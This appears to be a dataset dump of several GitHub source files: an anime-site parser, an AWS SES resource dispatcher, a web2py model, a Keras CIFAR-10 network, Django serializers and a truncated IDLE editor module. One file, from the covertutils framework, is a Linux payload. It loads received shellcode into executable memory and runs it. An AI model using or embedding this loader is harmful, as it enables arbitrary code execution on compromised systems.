hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8ba078046387df1c709f426807177e2c976ba89d | 2,100 | py | Python | mal/parsers/anime/characters.py | Nearata/myanimelist-rest-api | f254e53e7f54415c6b11f5b2e9a8afe142975f70 | [
"Unlicense"
] | 1 | 2020-11-11T14:55:23.000Z | 2020-11-11T14:55:23.000Z | mal/parsers/anime/characters.py | Nearata/myanimelist-rest-api | f254e53e7f54415c6b11f5b2e9a8afe142975f70 | [
"Unlicense"
] | 5 | 2021-03-31T19:26:31.000Z | 2021-08-09T13:33:07.000Z | mal/parsers/anime/characters.py | Nearata/myanimelist-rest-api | f254e53e7f54415c6b11f5b2e9a8afe142975f70 | [
"Unlicense"
] | null | null | null | from re import compile as re_compile
from bs4 import BeautifulSoup
from ...const import MAL_CDN_URL
class Characters:
    """Parse the character tables of a MyAnimeList anime "characters" page.

    Calling the instance returns ``{"data": [...]}`` where each entry holds
    a character's url, image, name, role and its list of voice actors.
    """

    def __init__(self, soup: BeautifulSoup) -> None:
        self.soup = soup

    def __call__(self) -> dict:
        # Character tables are the <table> siblings that precede the
        # "staff" anchor; they appear in reverse document order.
        staff_anchor = self.soup.select_one("a[name=staff]")
        tables = staff_anchor.find_previous_siblings("table")
        return {"data": [self.__character(table) for table in reversed(tables)]}

    def __character(self, table) -> dict:
        """Extract one character row (first td: picture, second: name/role,
        third: nested voice-actor table)."""
        picture_link = table.select_one("td:nth-of-type(1) > div.picSurround > a")
        thumbnail = table.select_one("td:nth-of-type(1) > div.picSurround > a > img")
        actor_rows = table.select("td:nth-of-type(3) > table tr")
        return {
            "url": picture_link.get("href"),
            "imageUrl": self.__image_url(thumbnail.get("data-src")),
            "name": table.select_one("td:nth-of-type(2) > a").get_text(),
            "role": table.select_one("td:nth-of-type(2) > div > small").get_text(),
            "voiceActors": [self.__actor(row) for row in actor_rows],
        }

    def __actor(self, row) -> dict:
        """Extract one voice-actor row: name/language on the left,
        picture link on the right."""
        actor_link = row.select_one("td:nth-of-type(2) > div.picSurround > a")
        actor_img = row.select_one("td:nth-of-type(2) > div.picSurround > a > img")
        return {
            "name": row.select_one("td:nth-of-type(1) > a").get_text(),
            "language": row.select_one("td:nth-of-type(1) > small").get_text(),
            "url": actor_link.get("href"),
            "image": actor_img.get("data-src"),
        }

    def __image_url(self, string: str) -> str:
        """Rebuild a CDN image URL from the path embedded in a lazy-load src."""
        regex = re_compile(r"\b\/images\/characters\/\d{1,}\/\d{1,}.jpg\b")
        return f"{MAL_CDN_URL}{''.join(regex.findall(string))}"
| 38.181818 | 87 | 0.382381 |
5a45b2887d00b67602744b2637d42efbc3749b06 | 843 | py | Python | covertutils/covertutils/payloads/linux/shellcode.py | aidden-laoch/sabre | 0940aa51dfc5074291df9d29db827ddb4010566d | [
"MIT"
] | 2 | 2020-11-23T23:54:32.000Z | 2021-05-25T12:28:05.000Z | commander/thirdparty/covertutils/payloads/linux/shellcode.py | how2how/ToyHome | 4457b1d28e21ed6fd4ab980a0f7fed345c570ae3 | [
"Apache-2.0"
] | 1 | 2021-03-20T05:43:02.000Z | 2021-03-20T05:43:02.000Z | commander/thirdparty/covertutils/payloads/linux/shellcode.py | how2how/ToyHome | 4457b1d28e21ed6fd4ab980a0f7fed345c570ae3 | [
"Apache-2.0"
] | null | null | null |
def work( storage, message ) :
	"""Payload entry point: execute the raw shellcode carried in `message`.

	SECURITY NOTE: this deliberately runs arbitrary machine code received
	over the covert channel -- it is an offensive-security payload.

	`storage` is not referenced here; presumably it is part of the common
	covertutils payload signature -- TODO confirm against other payloads.
	The shellcode is run in a child process, so a crash in the shellcode
	presumably cannot take down the handler itself -- verify.
	"""
	from ctypes import CDLL, c_char_p, c_void_p, memmove, cast, CFUNCTYPE, create_string_buffer
	from multiprocessing import Process
	shellcode = message
	size = len(shellcode)
	# print( len(shellcode) )
	libc = CDLL('libc.so.6')
	sc = c_char_p(shellcode)
	# valloc returns a page-aligned buffer, as required by mprotect below.
	addr = c_void_p(libc.valloc(size))
	print( "Memoving" )
	# Copy the shellcode bytes into the freshly allocated buffer.
	memmove(addr, sc, size)
	print( "Changing page protection" )
	# 0x7 == PROT_READ | PROT_WRITE | PROT_EXEC: make the page executable.
	libc.mprotect(addr, size, 0x7)
	print( "Making the process code" )
	# Reinterpret the buffer address as a callable C function pointer.
	run = cast(addr, CFUNCTYPE(c_void_p))
	# memorywithshell = create_string_buffer(shellcode, len(shellcode))
	# libc.mprotect(memorywithshell, size, 0x7)
	# run = cast(memorywithshell, CFUNCTYPE(c_void_p))
	# run()
	p = Process(target=run) # run the shellcode as independent process
	p.start()
from covertutils.shells.subshells import ShellcodeSubShell as shell
| 27.193548 | 92 | 0.736655 |
1518201ce98fea4e3467c93689577aa38326e47d | 1,603 | py | Python | src/ses.py | dc-pm/cfn-ses-provider | f72ac887c37a779a571b41ea8aeef6f468230e1a | [
"Apache-2.0"
] | 38 | 2018-03-08T12:06:03.000Z | 2022-03-25T14:15:10.000Z | src/ses.py | dc-pm/cfn-ses-provider | f72ac887c37a779a571b41ea8aeef6f468230e1a | [
"Apache-2.0"
] | 13 | 2018-12-22T10:49:33.000Z | 2021-06-26T14:48:57.000Z | src/ses.py | dc-pm/cfn-ses-provider | f72ac887c37a779a571b41ea8aeef6f468230e1a | [
"Apache-2.0"
] | 29 | 2018-11-05T10:52:23.000Z | 2022-03-29T16:09:36.000Z | import os
import logging
import cfn_dkim_provider
import dkim_tokens_provider
import domain_identity_provider
import mail_from_domain_provider
import active_rule_set_provider
import verified_identity_provider
import verified_mail_from_domain_provider
import identity_notifications_provider
import identity_policy_provider
def handler(request, context):
    """Route a CloudFormation custom-resource request to the provider
    module that implements the request's ResourceType.

    Unknown resource types fall back to the legacy cfn_dkim_provider,
    exactly as the original if/elif chain's final else branch did.
    """
    logging.basicConfig(level=os.getenv("LOG_LEVEL", "INFO"))
    dispatch = {
        "Custom::DkimTokens": dkim_tokens_provider.handler,
        "Custom::DomainIdentity": domain_identity_provider.handler,
        # Both spellings map to the same provider.
        "Custom::SESActiveReceiptRuleSet": active_rule_set_provider.handler,
        "Custom::ActiveReceiptRuleSet": active_rule_set_provider.handler,
        "Custom::IdentityNotifications": identity_notifications_provider.handler,
        "Custom::VerifiedIdentity": verified_identity_provider.handler,
        "Custom::IdentityPolicy": identity_policy_provider.handler,
        "Custom::MailFromDomain": mail_from_domain_provider.handler,
        "Custom::VerifiedMailFromDomain": verified_mail_from_domain_provider.handler,
    }
    provider = dispatch.get(request["ResourceType"], cfn_dkim_provider.handler)
    return provider(request, context)
| 43.324324 | 75 | 0.768559 |
2dd7522440b4fa236f41ad62b4379656ff3dfbef | 3,336 | py | Python | web2py-appliances-master/HotelManagementExample/models/db.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#########################################################################
## web2py scaffolding model: database connection, session storage, auth,
## services.  Works both on normal hosting and on Google App Engine.
## File is released under public domain and you can use without limitations
#########################################################################

if not request.env.web2py_runtime_gae:
    ## if NOT running on Google App Engine use SQLite or other DB
    db = DAL('sqlite://storage.sqlite')
else:
    ## connect to Google BigTable (optional 'google:datastore://namespace')
    db = DAL('google:datastore')
    ## store sessions and tickets there
    session.connect(request, response, db = db)
    ## or store session in Memcache, Redis, etc.
    ## from gluon.contrib.memdb import MEMDB
    ## from google.appengine.api.memcache import Client
    ## session.connect(request, response, db = MEMDB(Client()))

## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'

#########################################################################
## Auth (registration/login), CRUD, services and plugin setup.
## (more options discussed in gluon/tools.py)
#########################################################################

from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db, hmac_key=Auth.get_or_create_key())
crud, service, plugins = Crud(db), Service(), PluginManager()

## create all tables needed by auth if not custom tables
auth.define_tables()

## configure email
mail=auth.settings.mailer
# NOTE(review): `'logging' or '...'` always evaluates to 'logging', so mail
# is only logged, never sent.  This is the scaffolding's placeholder trick;
# replace the whole expression with a real SMTP host:port to enable sending.
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = 'you@gmail.com'
mail.settings.login = 'username:password'

## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True

## Janrain login (OpenID, Facebook, Twitter, ...); expects a
## domain:api_key entry in private/janrain.key.  Called unconditionally
## here -- fails at startup if the key file is absent.
from gluon.contrib.login_methods.rpx_account import use_janrain
use_janrain(auth,filename='private/janrain.key')

#########################################################################
## Define your tables below (or better in another model file), e.g.
## >>> db.define_table('mytable',Field('myfield','string'))
## Field types: 'string','text','password','integer','double','boolean',
## 'date','time','datetime','blob','upload','reference TABLENAME'.
## There is an implicit 'id integer autoincrement' field.
## Example controller usage:
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
bd5cea031009ccd1e685e973934c20e7b017688a | 7,203 | py | Python | dcnn.py | jessejlt/cifar10 | 0be30b0bfdd294030376999da6f5b8ae473e5751 | [
"MIT"
] | null | null | null | dcnn.py | jessejlt/cifar10 | 0be30b0bfdd294030376999da6f5b8ae473e5751 | [
"MIT"
] | null | null | null | dcnn.py | jessejlt/cifar10 | 0be30b0bfdd294030376999da6f5b8ae473e5751 | [
"MIT"
] | null | null | null | from __future__ import print_function
import numpy as np
from keras.datasets import cifar10
from keras.callbacks import TensorBoard
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K

# Train a small two-conv-layer network on CIFAR-10 and log metrics to
# TensorBoard.  Uses the Keras 1.x API (Convolution2D, border_mode,
# nb_epoch) as imported above.

# Fixed seed for reproducible weight initialization.
np.random.seed(42)

# Number of images to process per gradient update.
batch_size = 128
# CIFAR-10 has 10 object classes.
nb_classes = 10
# Input image dimensions.
img_rows, img_cols = 32, 32

#
# Adjustable hyperparameters
#
nb_epochs = 45          # how long we train
nb_filters = 32         # convolution filters per conv layer
pool_size = (2, 2)      # max-pooling window
kernel_size = (3, 3)    # convolution kernel size

# Load the data, pre-partitioned into train and test sets.
(X_train, y_train), (X_test, y_test) = cifar10.load_data()

# Theano ('th') and TensorFlow order tensor dimensions differently
# (channels-first vs channels-last), so shape the input accordingly.
if K.image_dim_ordering() == 'th':
    X_train = X_train.reshape(X_train.shape[0], 3, img_rows, img_cols)
    X_test = X_test.reshape(X_test.shape[0], 3, img_rows, img_cols)
    # BUGFIX: was (1, img_rows, img_cols), which declared a single-channel
    # input even though the data above is reshaped to 3 RGB channels --
    # the model would not match the data under Theano ordering.
    input_shape = (3, img_rows, img_cols)
else:
    X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 3)
    X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 3)
    input_shape = (img_rows, img_cols, 3)

# Scale pixel values from [0, 255] to [0, 1].
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print('X_train shape:', X_train.shape)
print('X_train.shape[0]:', X_train.shape[0])
print('X_test.shape[0]:', X_test.shape[0])

# One-hot encode the integer class labels.
# (Renamed the test labels to Y_test for consistency with Y_train;
# previously the encoded labels overwrote y_test.)
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)

# Build the model layer by layer.
model = Sequential()

# First convolution: learns local patterns independent of position,
# which keeps the parameter count far below a fully connected layer.
model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1],
                        border_mode='valid',
                        input_shape=input_shape))
# relu activation: 0 for x < 0, identity otherwise.
model.add(Activation('relu'))

# Second, identical convolution block.
model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))
model.add(Activation('relu'))

# Max pooling downsamples by keeping the largest value per window.
model.add(MaxPooling2D(pool_size=pool_size))
# Randomly drop 25% of activations during training to reduce overfitting.
model.add(Dropout(0.25))

# Dense head: flatten the feature maps, then a fully connected layer.
model.add(Flatten())
model.add(Dense(256))
model.add(Activation('relu'))
# Aggressive dropout before the classification layer.
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
# softmax yields a probability distribution over the 10 classes.
model.add(Activation('softmax'))

# Compile builds the computation graph for the backend (e.g. TensorFlow).
model.compile(loss='categorical_crossentropy',
              optimizer='adam',
              metrics=['accuracy'])

# TensorBoard callback for training visualizations.
tb = TensorBoard(log_dir='./logs')

model.fit(X_train,
          Y_train,
          batch_size=batch_size,
          nb_epoch=nb_epochs,
          verbose=1,
          validation_data=(X_test, Y_test),
          callbacks=[tb])

score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print("Accuracy: %.2f%%" % (score[1]*100))
| 42.370588 | 79 | 0.752048 |
efd3bc46d53c055a47f6a771f835039587a04c59 | 16,074 | py | Python | django_xsede_warehouse/warehouse_views/serializers.py | XSEDE/XSEDE_Information_Warehouse | 8b3aab42b7afd70ce69b9bf44551a0ded4491831 | [
"Apache-2.0"
] | 1 | 2019-10-29T22:50:29.000Z | 2019-10-29T22:50:29.000Z | django_xsede_warehouse/warehouse_views/serializers.py | XSEDE/XSEDE_Information_Warehouse | 8b3aab42b7afd70ce69b9bf44551a0ded4491831 | [
"Apache-2.0"
] | null | null | null | django_xsede_warehouse/warehouse_views/serializers.py | XSEDE/XSEDE_Information_Warehouse | 8b3aab42b7afd70ce69b9bf44551a0ded4491831 | [
"Apache-2.0"
] | null | null | null | from django.utils import timezone
from rest_framework import serializers
from rest_framework.relations import PrimaryKeyRelatedField
from glue2_db.models import ApplicationEnvironment, ApplicationHandle, Endpoint, ComputingManager, ExecutionEnvironment
from glue2_db.serializers import ApplicationHandle_DbSerializer
from outages.models import Outages
from rdr_db.models import RDRResource
from xdcdb.models import TGResource
#class JSONSerializerField(serializers.Field):
# """ Serializer for JSONField -- required to make field writable"""
# def to_internal_value(self, data):
# return data
# def to_representation(self, value):
# return value
class Generic_Resource_Serializer(serializers.ModelSerializer):
    """Serialize an RDRResource plus naming fields looked up from the
    matching XCDB TGResource row (keyed by info_resourceid).

    Note: recommended_use and access_description come from compute
    sub-resources.
    """
    ResourceID = serializers.CharField(source='info_resourceid')
    SiteID = serializers.CharField(source='info_siteid')
    OrganizationAbbrev = serializers.SerializerMethodField()
    OrganizationName = serializers.SerializerMethodField()
    AmieName = serializers.SerializerMethodField()
    PopsName = serializers.SerializerMethodField()
    XcdbName = serializers.SerializerMethodField()

    class Meta:
        model = RDRResource
        fields = ('ResourceID', 'SiteID',
                  'rdr_resource_id', 'rdr_type', 'parent_resource',
                  'resource_descriptive_name', 'resource_description',
                  'current_statuses', 'latest_status', 'latest_status_begin', 'latest_status_end',
                  'recommended_use', 'access_description',
                  'project_affiliation', 'provider_level', 'updated_at',
                  'OrganizationAbbrev', 'OrganizationName',
                  'AmieName','PopsName', 'XcdbName')

    def _xcdb_attr(self, RDRResource, attr):
        """Return one attribute of the TGResource whose pk is this
        resource's info_resourceid, or None if no such row exists.

        Replaces five byte-identical copies of the same try/except lookup.
        """
        try:
            return getattr(TGResource.objects.get(pk=RDRResource.info_resourceid), attr)
        except TGResource.DoesNotExist:
            return None

    def get_OrganizationAbbrev(self, RDRResource):
        return self._xcdb_attr(RDRResource, 'OrganizationAbbrev')

    def get_OrganizationName(self, RDRResource):
        return self._xcdb_attr(RDRResource, 'OrganizationName')

    def get_AmieName(self, RDRResource):
        return self._xcdb_attr(RDRResource, 'AmieName')

    def get_PopsName(self, RDRResource):
        return self._xcdb_attr(RDRResource, 'PopsName')

    def get_XcdbName(self, RDRResource):
        # XcdbName is stored as TgcdbResourceName on the XCDB side.
        return self._xcdb_attr(RDRResource, 'TgcdbResourceName')
class Software_Full_Serializer(serializers.ModelSerializer):
    """Public software entry: an ApplicationHandle joined with fields from
    its ApplicationEnvironment and the owning RDR resource's SiteID."""
    SiteID = serializers.SerializerMethodField('get_siteid')
    AppName = serializers.CharField(source='ApplicationEnvironment.AppName')
    AppVersion = serializers.CharField(source='ApplicationEnvironment.AppVersion')
    Description = serializers.CharField(source='ApplicationEnvironment.Description')
    Handle = serializers.SerializerMethodField('get_handle')
    Domain = serializers.SerializerMethodField('get_category')
    Keywords = serializers.SerializerMethodField('get_keywords')
    SupportStatus = serializers.SerializerMethodField('get_supportstatus')
    Repository = serializers.SerializerMethodField('get_repository')

    class Meta:
        model = ApplicationHandle
        fields = ('ResourceID', 'SiteID', 'AppName', 'AppVersion', 'Description', 'Handle', 'Domain',
                  'Keywords', 'SupportStatus', 'Repository', 'CreationTime','ID')

    def _env_json(self, ApplicationHandle, *keys):
        """Walk ApplicationEnvironment.EntityJSON down the given key path;
        return [] when any key is missing or the structure is malformed.

        Narrowed from four copies of a bare `except:` which also swallowed
        KeyboardInterrupt/SystemExit.
        """
        try:
            value = ApplicationHandle.ApplicationEnvironment.EntityJSON
            for key in keys:
                value = value[key]
            return value
        except (KeyError, TypeError, AttributeError):
            return []

    def get_siteid(self, ApplicationHandle):
        """SiteID of the RDR 'resource' record for this ResourceID, or None."""
        try:
            RDR_object = RDRResource.objects.filter(rdr_type='resource').filter(info_resourceid=ApplicationHandle.ResourceID)
            if RDR_object and RDR_object[0] and RDR_object[0].info_siteid:
                return RDR_object[0].info_siteid
        except RDRResource.DoesNotExist:
            # filter() never raises DoesNotExist; kept as a defensive no-op.
            pass
        return None

    def get_handle(self, ApplicationHandle):
        return {'HandleType': ApplicationHandle.Type,
                'HandleKey': ApplicationHandle.Value}

    def get_category(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Extension', 'Category')

    def get_keywords(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Keywords')

    def get_supportstatus(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Extension', 'SupportStatus')

    def get_repository(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Repository')
# Same as Software_Full_Serializer but adds SupportContact
class Software_Community_Serializer(serializers.ModelSerializer):
    """Same as Software_Full_Serializer but additionally exposes the
    SupportContact extension field."""
    SiteID = serializers.SerializerMethodField('get_siteid')
    AppName = serializers.CharField(source='ApplicationEnvironment.AppName')
    AppVersion = serializers.CharField(source='ApplicationEnvironment.AppVersion')
    Description = serializers.CharField(source='ApplicationEnvironment.Description')
    Handle = serializers.SerializerMethodField('get_handle')
    Domain = serializers.SerializerMethodField('get_category')
    Keywords = serializers.SerializerMethodField('get_keywords')
    SupportStatus = serializers.SerializerMethodField('get_supportstatus')
    SupportContact = serializers.SerializerMethodField('get_supportcontact')
    Repository = serializers.SerializerMethodField('get_repository')

    class Meta:
        model = ApplicationHandle
        fields = ('ResourceID', 'SiteID', 'AppName', 'AppVersion', 'Description', 'Handle', 'Domain',
                  'Keywords', 'SupportStatus', 'SupportContact', 'Repository', 'CreationTime', 'ID')

    def _env_json(self, ApplicationHandle, *keys):
        """Walk ApplicationEnvironment.EntityJSON down the given key path;
        return [] when any key is missing or the structure is malformed.

        Narrowed from five copies of a bare `except:` which also swallowed
        KeyboardInterrupt/SystemExit.
        """
        try:
            value = ApplicationHandle.ApplicationEnvironment.EntityJSON
            for key in keys:
                value = value[key]
            return value
        except (KeyError, TypeError, AttributeError):
            return []

    def get_siteid(self, ApplicationHandle):
        """SiteID of the RDR 'resource' record for this ResourceID, or None."""
        try:
            RDR_object = RDRResource.objects.filter(rdr_type='resource').filter(info_resourceid=ApplicationHandle.ResourceID)
            if RDR_object and RDR_object[0] and RDR_object[0].info_siteid:
                return RDR_object[0].info_siteid
        except RDRResource.DoesNotExist:
            # filter() never raises DoesNotExist; kept as a defensive no-op.
            pass
        return None

    def get_handle(self, ApplicationHandle):
        return {'HandleType': ApplicationHandle.Type,
                'HandleKey': ApplicationHandle.Value}

    def get_category(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Extension', 'Category')

    def get_keywords(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Keywords')

    def get_supportstatus(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Extension', 'SupportStatus')

    def get_supportcontact(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Extension', 'SupportContact')

    def get_repository(self, ApplicationHandle):
        return self._env_json(ApplicationHandle, 'Repository')
class SGCI_Resource_Serializer_100(serializers.ModelSerializer):
    """Serialize an RDRResource into SGCI Resource Description schema 1.0.0.

    compute/storage sub-resources and outages are emitted only when present
    (see to_representation).
    """
    REMOVABLE_FIELDS = ['computeResources', 'storageResources', 'resourceOutages']
    schemaVersion = serializers.SerializerMethodField()
    host = serializers.CharField(source='info_resourceid')
    name = serializers.CharField(source='resource_descriptive_name')
    description = serializers.CharField(source='resource_description')
    computeResources = serializers.SerializerMethodField()
    storageResources = serializers.SerializerMethodField()
    resourceStatus = serializers.SerializerMethodField()
    resourceOutages = serializers.SerializerMethodField()

    class Meta:
        model = RDRResource
        fields = ('schemaVersion', 'host', 'name', 'description', 'computeResources', 'storageResources', 'resourceStatus', 'resourceOutages')

    def to_representation(self, instance):
        """Drop optional keys whose method returned None."""
        rep = super().to_representation(instance)
        for field in self.REMOVABLE_FIELDS:
            try:
                if rep[field] is None:
                    rep.pop(field)
            except KeyError:
                pass
        return rep

    def get_schemaVersion(self, RDRResource):
        return '1.0.0'

    def _endpoint_connections(self, info_resourceid):
        """Map the resource's GLUE2 Endpoints to SGCI connection dicts.

        Was duplicated (~60 lines) between get_computeResources and
        get_storageResources; the two copies were token-identical.
        'host' is emitted only when it differs from the ResourceID itself;
        a port of 0 falls back to the protocol default (22 / 2811).
        """
        connections = []
        for ep in Endpoint.objects.filter(ResourceID=info_resourceid):
            if ep.InterfaceName == 'org.globus.openssh':
                if ep.URL.startswith('gsissh://'):
                    url = ep.URL[len('gsissh://'):].rstrip('/')
                else:
                    url = ep.URL[:]
                if ':' in url:
                    host, port = url.split(':')
                else:
                    host, port = url, 22
                # One connection per (protocol, security) combination.
                for cp in ['SSH', 'SCP']:
                    for sp in ['SSHKEYS', 'X509']:
                        con = {'connectionProtocol': cp, 'securityProtocol': sp}
                        if host == ep.ResourceID:
                            con['port'] = int(port) or 22
                        else:
                            con['host'] = host
                            con['port'] = int(port)
                        connections.append(con)
            elif ep.InterfaceName == 'org.globus.gridftp':
                if ep.URL.startswith('gsiftp://'):
                    url = ep.URL[len('gsiftp://'):].rstrip('/')
                else:
                    url = ep.URL[:]
                if ':' in url:
                    host, port = url.split(':')
                else:
                    host, port = url, 2811
                con = {'connectionProtocol': 'GRIDFTP', 'securityProtocol': 'X509'}
                if host == ep.ResourceID:
                    con['port'] = int(port) or 2811
                else:
                    con['host'] = host
                    con['port'] = int(port) or 2811
                connections.append(con)
        return connections

    def _partition(self, ev):
        """Build one batch-system partition dict from an ExecutionEnvironment."""
        totalNodes = ev.EntityJSON.get('TotalInstances')
        if not totalNodes:
            # Fall back to counting the Extension.Nodes list when present.
            extension = ev.EntityJSON.get('Extension')
            if extension and extension.get('Nodes'):
                totalNodes = len(extension.get('Nodes'))
        cpuCount = ev.EntityJSON.get('LogicalCPUs')
        par = {'name': ev.Name,
               'nodeHardware': {
                   'cpuType': ev.EntityJSON.get('Platform', 'n/a'),
                   'memorySize': ev.EntityJSON.get('MainMemorySize', 'n/a')}
               }
        if totalNodes:
            par['totalNodes'] = totalNodes
        if cpuCount:
            par['nodeHardware']['cpuCount'] = cpuCount
        return par

    def get_computeResources(self, RDRResource):
        """BATCH + FORK scheduler entries for compute resources; None otherwise."""
        if RDRResource.rdr_type != 'compute':
            return None
        connections = self._endpoint_connections(RDRResource.info_resourceid)

        batchSystem = {}
        cm = ComputingManager.objects.filter(ResourceID=RDRResource.info_resourceid)
        if cm and cm[0].Name:
            batchSystem['jobManager'] = cm[0].Name
        else:
            batchSystem['jobManager'] = RDRResource.other_attributes.get('batch_system', 'N/A')

        partitions = [self._partition(ev)
                      for ev in ExecutionEnvironment.objects.filter(ResourceID=RDRResource.info_resourceid)]
        if partitions:
            batchSystem['partitions'] = partitions

        batch = {'schedulerType': 'BATCH'}
        if connections:
            batch['connections'] = connections
        if batchSystem:
            batch['batchSystem'] = batchSystem
        fork = {'schedulerType': 'FORK',
                'forkSystem': {'systemType': 'LINUX'}
                }
        if connections:
            fork['connections'] = connections
        return [batch, fork]

    def get_storageResources(self, RDRResource):
        """A single POSIX storage entry for storage resources; None otherwise."""
        if RDRResource.rdr_type != 'storage':
            return None
        connections = self._endpoint_connections(RDRResource.info_resourceid)
        storage = {'storageType': 'POSIX'}
        if connections:
            storage['connections'] = connections
        return [storage]

    def get_resourceStatus(self, RDRResource):
        """Capitalized latest status plus optional ISO-date start/end bounds."""
        status = {'status': RDRResource.latest_status.capitalize()}
        if RDRResource.latest_status_begin:
            status['starts'] = '{:%Y-%m-%d}'.format(RDRResource.latest_status_begin)
        if RDRResource.latest_status_end:
            status['ends'] = '{:%Y-%m-%d}'.format(RDRResource.latest_status_end)
        return status

    def get_resourceOutages(self, RDRResource):
        """Current and future outages (OutageEnd >= now), or None when empty
        so to_representation drops the key."""
        now = timezone.now()
        outages = []
        for out in Outages.objects.filter(ResourceID=RDRResource.info_resourceid, OutageEnd__gte=now):
            item = {'type': out.OutageType.capitalize(),
                    'name': out.Subject,
                    'startsDatetime': out.OutageStart.isoformat(),
                    'endsDatetime': out.OutageEnd.isoformat()}
            if out.Content:
                item['description'] = out.Content
            if out.WebURL:
                item['url'] = out.WebURL
            outages.append(item)
        if outages:
            return outages
        else:
            return None
| 42.188976 | 142 | 0.593629 |
f4437668a3edb84ac0420d5f83552363d7e9d974 | 67,653 | py | Python | Lib/idlelib/editor.py | vahtras/cpython | a0bb51e44cd43a7d2836a96a3804162203e44514 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2019-09-02T14:20:59.000Z | 2021-02-16T13:22:40.000Z | Lib/idlelib/editor.py | Exifers/cpython | a5b76167dedf4d15211a216c3ca7b98e3cec33b8 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2019-04-23T15:32:51.000Z | 2019-05-10T20:32:32.000Z | Lib/idlelib/editor.py | Munyola/cpython | 11303dd6035a7d7f78025ce5a3e3b9bdf7380c9a | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2019-05-20T14:20:34.000Z | 2019-05-20T14:20:34.000Z | import importlib.abc
import importlib.util
import os
import platform
import string
import tokenize
import traceback
import webbrowser
from tkinter import *
from tkinter.ttk import Scrollbar
import tkinter.simpledialog as tkSimpleDialog
import tkinter.messagebox as tkMessageBox
from idlelib.config import idleConf
from idlelib import configdialog
from idlelib import grep
from idlelib import help
from idlelib import help_about
from idlelib import macosx
from idlelib.multicall import MultiCallCreator
from idlelib import pyparse
from idlelib import query
from idlelib import replace
from idlelib import search
from idlelib import window
# The default tab setting for a Text widget, in average-width characters.
TK_TABWIDTH_DEFAULT = 8

# Version suffix appended to window titles by saved_change_hook.
_py_version = ' (%s)' % platform.python_version()

# True when running on macOS; used for platform-specific UI tweaks.
darwin = sys.platform == 'darwin'
def _sphinx_version():
"Format sys.version_info to produce the Sphinx version string used to install the chm docs"
major, minor, micro, level, serial = sys.version_info
release = '%s%s' % (major, minor)
release += '%s' % (micro,)
if level == 'candidate':
release += 'rc%s' % (serial,)
elif level != 'final':
release += '%s%s' % (level[0], serial)
return release
class EditorWindow(object):
    """A source-editor toplevel window.

    NOTE(review): comments below indicate this class is subclassed
    (e.g. PyShell overrides prompt_last_line) -- confirm before changing
    class-level attributes.
    """
    # Feature classes are bound as class attributes so that subclasses
    # can substitute their own implementations.
    from idlelib.percolator import Percolator
    from idlelib.colorizer import ColorDelegator, color_config
    from idlelib.undo import UndoDelegator
    from idlelib.iomenu import IOBinding, encoding
    from idlelib import mainmenu
